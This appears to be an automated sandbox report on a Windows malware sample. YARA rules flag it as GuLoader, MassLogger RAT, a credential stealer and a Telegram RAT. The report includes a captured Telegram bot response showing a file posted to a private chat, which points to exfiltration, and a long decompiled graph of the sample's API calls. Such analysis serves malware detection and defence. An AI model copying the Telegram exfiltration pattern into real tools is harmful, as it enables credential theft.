                                                                                                                2025-01-10 21:44:53 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43667,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545493,"document":{"file_n


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:16:42:46
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\b5BQbAhwVD.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'050'481 bytes
                                                                                                                MD5 hash:8E4A2B26B311D9E5C9A920186B0B8025
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:16:43:13
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\b5BQbAhwVD.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'050'481 bytes
                                                                                                                MD5 hash:8E4A2B26B311D9E5C9A920186B0B8025
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:19.9%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:19.8%
                                                                                                                  Total number of Nodes:1592
                                                                                                                  Total number of Limit Nodes:39
                                                                                                                  execution_graph 5311 72ed166d 5317 72ed1516 5311->5317 5313 72ed16cb GlobalFree 5314 72ed1685 5314->5313 5315 72ed16a0 5314->5315 5316 72ed16b7 VirtualFree 5314->5316 5315->5313 5316->5313 5319 72ed151c 5317->5319 5318 72ed1522 5318->5314 5319->5318 5320 72ed152e GlobalFree 5319->5320 5320->5314 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4182 405c64 4179->4182 4271 4063e8 lstrcpynW 4179->4271 4182->4180 4300 40672b FindFirstFileW 4182->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4182 4197 405c3c FindNextFileW 4200 405c52 FindClose 4197->4200 4197->4213 4198 405ab2 5 API calls 4201 405c94 4198->4201 4200->4194 4202 405c98 4201->4202 4203 405cae 4201->4203 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4197 4211 405cac 4210->4211 4211->4180 4213->4197 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4227 406417 4215->4227 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4227 4222 40640a 10 API calls 4222->4219 4223 406545 GetSystemDirectoryW 4223->4227 4225 406558 GetWindowsDirectoryW 4225->4227 4226 40667c 5 API calls 4226->4227 4227->4216 4227->4219 4227->4222 4227->4223 4227->4225 4227->4226 4228 40658c SHGetSpecialFolderLocation 4227->4228 4229 40640a 10 API calls 4227->4229 4230 4065d3 lstrcatW 4227->4230 4241 4062b6 4227->4241 4246 40632f wsprintfW 4227->4246 4247 4063e8 lstrcpynW 4227->4247 4228->4227 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4228->4231 4229->4227 4230->4227 4231->4227 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4238 4066ff 4233->4238 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4238 4235->4233 4235->4238 4236 406725 4236->4173 4238->4234 4238->4236 4239->4233 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4227 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4227 4247->4227 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4266 405cbd 3 API calls 4265->4266 4268 405e2d GetFileAttributesW 4266->4268 4267 40672b 2 API calls 4267->4269 4268->4262 4269->4262 4269->4264 4269->4267 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405adf 4280->4213 4281 405ad5 DeleteFileW 4283 405adb 4281->4283 4282 405acd RemoveDirectoryW 4282->4283 4283->4280 4284 405aeb SetFileAttributesW 4283->4284 4284->4280 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4292 4054c3 4289->4292 4293 4054b6 SetWindowTextW 4289->4293 4291 4054a7 lstrcatW 4290->4291 4290->4295 4291->4289 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4213 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4312 405d97 4307->4312 4310 405d92 CharNextW 4308->4310 4308->4312 4309 405dbb 4309->4262 4309->4263 4310->4309 4311 405cea CharNextW 4311->4312 4312->4309 4312->4311 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4282 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4364 401423 24 API calls 4360->4364 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4370 40165b 4364->4370 4369 40164a SetCurrentDirectoryW 4369->4370 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4369 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4402 4053da 4398->4402 4410 405431 4398->4410 4400 405410 4399->4400 4401 4053f0 IsWindowVisible 4399->4401 4405 405436 CallWindowProcW 4400->4405 4419 404d9a 4400->4419 4404 4053fd 4401->4404 4401->4410 4411 4043ab 4402->4411 4414 404d1a SendMessageW 4404->4414 4406 4053e4 4405->4406 4410->4405 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4418 404d71 4415->4418 4417 404d76 4416->4417 4416->4418 4417->4415 4418->4400 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4410 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4882 401e49 4883 402c1f 17 API calls 4882->4883 4884 401e4f 4883->4884 4885 402c1f 17 API calls 4884->4885 4886 401e5b 4885->4886 4887 401e72 EnableWindow 4886->4887 4888 401e67 ShowWindow 4886->4888 4889 402ac5 4887->4889 4888->4889 4890 40264a 4891 402c1f 17 API calls 4890->4891 4892 402659 4891->4892 4893 4026a3 ReadFile 4892->4893 4894 405f61 ReadFile 4892->4894 4895 4026e3 MultiByteToWideChar 4892->4895 4896 402798 4892->4896 4899 40273c 4892->4899 4900 402709 SetFilePointer MultiByteToWideChar 4892->4900 4901 4027a9 4892->4901 4903 402796 4892->4903 4893->4892 4893->4903 4894->4892 4895->4892 4913 40632f wsprintfW 4896->4913 4899->4892 4899->4903 4904 405fbf SetFilePointer 4899->4904 4900->4892 4902 4027ca SetFilePointer 4901->4902 4901->4903 4902->4903 4905 405fdb 4904->4905 4912 405ff3 4904->4912 4906 405f61 ReadFile 4905->4906 4907 405fe7 4906->4907 4908 406024 SetFilePointer 4907->4908 4909 405ffc SetFilePointer 4907->4909 4907->4912 4908->4912 4909->4908 4910 406007 4909->4910 4911 405f90 WriteFile 4910->4911 4911->4912 4912->4899 4913->4903 4914 404dcc GetDlgItem GetDlgItem 4915 404e1e 7 API calls 4914->4915 4961 405037 4914->4961 4916 404ec1 DeleteObject 4915->4916 4917 404eb4 SendMessageW 4915->4917 4918 404eca 4916->4918 4917->4916 4919 404ed9 4918->4919 4920 404f01 4918->4920 4921 40640a 17 API calls 4919->4921 4923 40435f 18 API calls 4920->4923 4925 404ee3 SendMessageW SendMessageW 4921->4925 4922 4050fc 4932 40510d SendMessageW 4922->4932 4937 40511b 4922->4937 4929 404f15 4923->4929 4924 4051c7 4926 4051d1 SendMessageW 4924->4926 4927 4051d9 4924->4927 4925->4918 4926->4927 4938 4051f2 4927->4938 4939 4051eb ImageList_Destroy 4927->4939 4947 405202 4927->4947 4928 405097 4933 404d1a 5 API calls 4928->4933 4934 40435f 18 API calls 4929->4934 4930 4053af 4931 4043c6 8 API calls 4930->4931 4936 4053bd 4931->4936 4932->4937 4950 4050a8 4933->4950 4951 404f23 4934->4951 4935 405174 SendMessageW 4935->4930 4941 405189 SendMessageW 4935->4941 4937->4924 4937->4930 4937->4935 4942 4051fb GlobalFree 4938->4942 4938->4947 4939->4938 4940 405371 4940->4930 4945 405383 ShowWindow GetDlgItem ShowWindow 4940->4945 4944 40519c 4941->4944 4942->4947 4943 404ff8 GetWindowLongW SetWindowLongW 4946 405011 4943->4946 4952 4051ad SendMessageW 4944->4952 4945->4930 4948 405017 ShowWindow 4946->4948 4949 40502f 4946->4949 4947->4940 4959 404d9a 4 API calls 4947->4959 4965 40523d 4947->4965 4970 404394 SendMessageW 4948->4970 4971 404394 SendMessageW 4949->4971 4950->4922 4951->4943 4953 404ff2 4951->4953 4956 404f73 SendMessageW 4951->4956 4957 404fc0 SendMessageW 4951->4957 4958 404faf SendMessageW 4951->4958 4952->4924 4953->4943 4953->4946 4956->4951 4957->4951 4958->4951 4959->4965 4960 40502a 4960->4930 4961->4922 4961->4928 4961->4937 4962 405347 InvalidateRect 4962->4940 4963 40535d 4962->4963 4972 404cd5 4963->4972 4964 40526b SendMessageW 4966 405281 4964->4966 4965->4964 4965->4966 4966->4962 4967 4052e2 4966->4967 4969 4052f5 SendMessageW SendMessageW 4966->4969 4967->4969 4969->4966 4970->4960 4971->4961 4975 404c0c 4972->4975 4974 404cea 4974->4940 4976 404c25 4975->4976 4977 40640a 17 API calls 4976->4977 4978 404c89 4977->4978 4979 40640a 17 API calls 4978->4979 4980 404c94 4979->4980 4981 40640a 17 API calls 4980->4981 4982 404caa lstrlenW wsprintfW SetDlgItemTextW 4981->4982 4982->4974 5324 72ed10e1 5328 72ed1111 5324->5328 5325 72ed11d8 GlobalFree 5326 72ed12ba 2 API calls 5326->5328 5327 72ed11d3 5327->5325 5328->5325 5328->5326 5328->5327 5329 72ed11f8 GlobalFree 5328->5329 5330 72ed1272 2 API calls 5328->5330 5331 72ed1164 GlobalAlloc 5328->5331 5332 72ed12e1 lstrcpyW 5328->5332 5333 72ed11c4 GlobalFree 5328->5333 5329->5328 5330->5333 5331->5328 5332->5328 5333->5328 5334 4016cc 5335 402c41 17 API calls 5334->5335 5336 4016d2 GetFullPathNameW 5335->5336 5337 4016ec 5336->5337 5343 40170e 5336->5343 5340 40672b 2 API calls 5337->5340 5337->5343 5338 401723 GetShortPathNameW 5339 402ac5 5338->5339 5341 4016fe 5340->5341 5341->5343 5344 4063e8 lstrcpynW 5341->5344 5343->5338 5343->5339 5344->5343 5345 40234e 5346 402c41 17 API calls 5345->5346 5347 40235d 5346->5347 5348 402c41 17 API calls 5347->5348 5349 402366 5348->5349 5350 402c41 17 API calls 5349->5350 5351 402370 GetPrivateProfileStringW 5350->5351 5352 4044cf lstrlenW 5353 4044f0 WideCharToMultiByte 5352->5353 5354 4044ee 5352->5354 5354->5353 5355 72ed22fd 5356 72ed2367 5355->5356 5357 72ed2372 GlobalAlloc 5356->5357 5358 72ed2391 5356->5358 5357->5356 5359 404850 5360 40487c 5359->5360 5361 40488d 5359->5361 5420 405a32 GetDlgItemTextW 5360->5420 5363 404899 GetDlgItem 5361->5363 5368 4048f8 5361->5368 5365 4048ad 5363->5365 5364 404887 5367 40667c 5 API calls 5364->5367 5370 4048c1 SetWindowTextW 5365->5370 5375 405d68 4 API calls 5365->5375 5366 4049dc 5417 404b8b 5366->5417 5422 405a32 GetDlgItemTextW 5366->5422 5367->5361 5368->5366 5371 40640a 17 API calls 5368->5371 5368->5417 5373 40435f 18 API calls 5370->5373 5376 40496c SHBrowseForFolderW 5371->5376 5372 404a0c 5377 405dc5 18 API calls 5372->5377 5378 4048dd 5373->5378 5374 4043c6 8 API calls 5379 404b9f 5374->5379 5380 4048b7 5375->5380 5376->5366 5381 404984 CoTaskMemFree 5376->5381 5382 404a12 5377->5382 5383 40435f 18 API calls 5378->5383 5380->5370 5386 405cbd 3 API calls 5380->5386 5384 405cbd 3 API calls 5381->5384 5423 4063e8 lstrcpynW 5382->5423 5385 4048eb 5383->5385 5387 404991 5384->5387 5421 404394 SendMessageW 5385->5421 5386->5370 5390 4049c8 SetDlgItemTextW 5387->5390 5395 40640a 17 API calls 5387->5395 5390->5366 5391 4048f1 5393 4067c2 5 API calls 5391->5393 5392 404a29 5394 4067c2 5 API calls 5392->5394 5393->5368 5402 404a30 5394->5402 5396 4049b0 lstrcmpiW 5395->5396 5396->5390 5399 4049c1 lstrcatW 5396->5399 5397 404a71 5424 4063e8 lstrcpynW 5397->5424 5399->5390 5400 404a78 5401 405d68 4 API calls 5400->5401 5403 404a7e GetDiskFreeSpaceW 5401->5403 5402->5397 5405 405d09 2 API calls 5402->5405 5407 404ac9 5402->5407 5406 404aa2 MulDiv 5403->5406 5403->5407 5405->5402 5406->5407 5408 404cd5 20 API calls 5407->5408 5418 404b3a 5407->5418 5409 404b27 5408->5409 5412 404b3c SetDlgItemTextW 5409->5412 5413 404b2c 5409->5413 5410 40140b 2 API calls 5414 404b5d 5410->5414 5412->5418 5416 404c0c 20 API calls 5413->5416 5425 404381 EnableWindow 5414->5425 5415 404b79 5415->5417 5426 4047a9 5415->5426 5416->5418 5417->5374 5418->5410 5418->5414 5420->5364 5421->5391 5422->5372 5423->5392 5424->5400 5425->5415 5427 4047b7 5426->5427 5428 4047bc SendMessageW 5426->5428 5427->5428 5428->5417 5429 401b53 5430 402c41 17 API calls 5429->5430 5431 401b5a 5430->5431 5432 402c1f 17 API calls 5431->5432 5433 401b63 wsprintfW 5432->5433 5434 402ac5 5433->5434 5435 401956 5436 402c41 17 API calls 5435->5436 5437 40195d lstrlenW 5436->5437 5438 402592 5437->5438 5446 4014d7 5447 402c1f 17 API calls 5446->5447 5448 4014dd Sleep 5447->5448 5450 402ac5 5448->5450 5451 401f58 5452 402c41 17 API calls 5451->5452 5453 401f5f 5452->5453 5454 40672b 2 API calls 5453->5454 5455 401f65 5454->5455 5457 401f76 5455->5457 5458 40632f wsprintfW 5455->5458 5458->5457 5459 402259 5460 402c41 17 API calls 5459->5460 5461 40225f 5460->5461 5462 402c41 17 API calls 5461->5462 5463 402268 5462->5463 5464 402c41 17 API calls 5463->5464 5465 402271 5464->5465 5466 40672b 2 API calls 5465->5466 5467 40227a 5466->5467 5468 40228b lstrlenW lstrlenW 5467->5468 5472 40227e 5467->5472 5470 405450 24 API calls 5468->5470 5469 405450 24 API calls 5473 402286 5469->5473 5471 4022c9 SHFileOperationW 5470->5471 5471->5472 5471->5473 5472->5469 5302 40175c 5303 402c41 17 API calls 5302->5303 5304 401763 5303->5304 5305 405f0d 2 API calls 5304->5305 5306 40176a 5305->5306 5307 405f0d 2 API calls 5306->5307 5307->5306 5474 401d5d GetDlgItem GetClientRect 5475 402c41 17 API calls 5474->5475 5476 401d8f LoadImageW SendMessageW 5475->5476 5477 402ac5 5476->5477 5478 401dad DeleteObject 5476->5478 5478->5477 5479 4022dd 5480 4022f7 5479->5480 5481 4022e4 5479->5481 5482 40640a 17 API calls 5481->5482 5483 4022f1 5482->5483 5484 405a4e MessageBoxIndirectW 5483->5484 5484->5480 5485 401563 5486 402a6b 5485->5486 5489 40632f wsprintfW 5486->5489 5488 402a70 5489->5488 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 40288b 4446 402438 4448 402444 4446->4448 4459 402c1f 4446->4459 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4451 402463 RegSetValueExW 4448->4451 4462 4031d6 4448->4462 4449->4446 4453 402479 RegCloseKey 4451->4453 4453->4445 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4448 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4473 40329e 4468->4473 4470 403238 4469->4470 4471 4032a4 ReadFile 4470->4471 4470->4473 4474 403247 4470->4474 4471->4473 4473->4451 4474->4473 4475 405f61 ReadFile 4474->4475 4476 405f90 WriteFile 4474->4476 4475->4474 4476->4474 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4485 402e8e 32 API calls 4482->4485 4494 40345d SetFilePointer 4483->4494 4490 403208 4485->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4473 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5497 402868 5498 402c41 17 API calls 5497->5498 5499 40286f FindFirstFileW 5498->5499 5500 402882 5499->5500 5501 402897 5499->5501 5505 40632f wsprintfW 5501->5505 5503 4028a0 5506 4063e8 lstrcpynW 5503->5506 5505->5503 5506->5500 5507 401968 5508 402c1f 17 API calls 5507->5508 5509 40196f 5508->5509 5510 402c1f 17 API calls 5509->5510 5511 40197c 5510->5511 5512 402c41 17 API calls 5511->5512 5513 401993 lstrlenW 5512->5513 5515 4019a4 5513->5515 5514 4019e5 5515->5514 5519 4063e8 lstrcpynW 5515->5519 5517 4019d5 5517->5514 5518 4019da lstrlenW 5517->5518 5518->5514 5519->5517 5520 40166a 5521 402c41 17 API calls 5520->5521 5522 401670 5521->5522 5523 40672b 2 API calls 5522->5523 5524 401676 5523->5524 5012 40176f 5013 402c41 17 API calls 5012->5013 5014 401776 5013->5014 5015 401796 5014->5015 5016 40179e 5014->5016 5052 4063e8 lstrcpynW 5015->5052 5053 4063e8 lstrcpynW 5016->5053 5019 40179c 5023 40667c 5 API calls 5019->5023 5020 4017a9 5021 405cbd 3 API calls 5020->5021 5022 4017af lstrcatW 5021->5022 5022->5019 5040 4017bb 5023->5040 5024 40672b 2 API calls 5024->5040 5025 4017f7 5026 405eb9 2 API calls 5025->5026 5026->5040 5028 4017cd CompareFileTime 5028->5040 5029 40188d 5031 405450 24 API calls 5029->5031 5030 401864 5033 405450 24 API calls 5030->5033 5041 401879 5030->5041 5032 401897 5031->5032 5035 4031d6 44 API calls 5032->5035 5033->5041 5034 4063e8 lstrcpynW 5034->5040 5036 4018aa 5035->5036 5037 4018be SetFileTime 5036->5037 5039 4018d0 CloseHandle 5036->5039 5037->5039 5038 40640a 17 API calls 5038->5040 5039->5041 5042 4018e1 5039->5042 5040->5024 5040->5025 5040->5028 5040->5029 5040->5030 5040->5034 5040->5038 5047 405a4e MessageBoxIndirectW 5040->5047 5051 405ede GetFileAttributesW CreateFileW 5040->5051 5043 4018e6 5042->5043 5044 4018f9 5042->5044 5045 40640a 17 API calls 5043->5045 5046 40640a 17 API calls 5044->5046 5048 4018ee lstrcatW 5045->5048 5049 401901 5046->5049 5047->5040 5048->5049 5050 405a4e MessageBoxIndirectW 5049->5050 5050->5041 5051->5040 5052->5019 5053->5020 5054 4027ef 5055 4027f6 5054->5055 5057 402a70 5054->5057 5056 402c1f 17 API calls 5055->5056 5058 4027fd 5056->5058 5059 40280c SetFilePointer 5058->5059 5059->5057 5060 40281c 5059->5060 5062 40632f wsprintfW 5060->5062 5062->5057 5525 401a72 5526 402c1f 17 API calls 5525->5526 5527 401a7b 5526->5527 5528 402c1f 17 API calls 5527->5528 5529 401a20 5528->5529 5530 406af2 5531 406976 5530->5531 5532 4072e1 5531->5532 5533 406a00 GlobalAlloc 5531->5533 5534 4069f7 GlobalFree 5531->5534 5535 406a77 GlobalAlloc 5531->5535 5536 406a6e GlobalFree 5531->5536 5533->5531 5533->5532 5534->5533 5535->5531 5535->5532 5536->5535 5537 401573 5538 401583 ShowWindow 5537->5538 5539 40158c 5537->5539 5538->5539 5540 402ac5 5539->5540 5541 40159a ShowWindow 5539->5541 5541->5540 5542 401cf3 5543 402c1f 17 API calls 5542->5543 5544 401cf9 IsWindow 5543->5544 5545 401a20 5544->5545 5546 402df3 5547 402e05 SetTimer 5546->5547 5548 402e1e 5546->5548 5547->5548 5549 402e6c 5548->5549 5550 402e72 MulDiv 5548->5550 5551 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5550->5551 5551->5549 5553 72ed18d9 5555 72ed18fc 5553->5555 5554 72ed1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5557 72ed1272 2 API calls 5554->5557 5555->5554 5556 72ed1931 GlobalFree 5555->5556 5556->5554 5558 72ed1ace GlobalFree GlobalFree 5557->5558 5559 72ed1058 5562 72ed1074 5559->5562 5560 72ed10dd 5561 72ed1092 5564 72ed1516 GlobalFree 5561->5564 5562->5560 5562->5561 5563 72ed1516 GlobalFree 5562->5563 5563->5561 5565 72ed10a2 5564->5565 5566 72ed10a9 GlobalSize 5565->5566 5567 72ed10b2 5565->5567 5566->5567 5568 72ed10c7 5567->5568 5569 72ed10b6 GlobalAlloc 5567->5569 5571 72ed10d2 GlobalFree 5568->5571 5570 72ed153d 3 API calls 5569->5570 5570->5568 5571->5560 5572 4014f5 SetForegroundWindow 5573 402ac5 5572->5573 5574 402576 5575 402c41 17 API calls 5574->5575 5576 40257d 5575->5576 5579 405ede GetFileAttributesW CreateFileW 5576->5579 5578 402589 5579->5578 5254 401b77 5255 401b84 5254->5255 5256 401bc8 5254->5256 5259 401c0d 5255->5259 5264 401b9b 5255->5264 5257 401bf2 GlobalAlloc 5256->5257 5258 401bcd 5256->5258 5260 40640a 17 API calls 5257->5260 5272 4022f7 5258->5272 5275 4063e8 lstrcpynW 5258->5275 5261 40640a 17 API calls 5259->5261 5259->5272 5260->5259 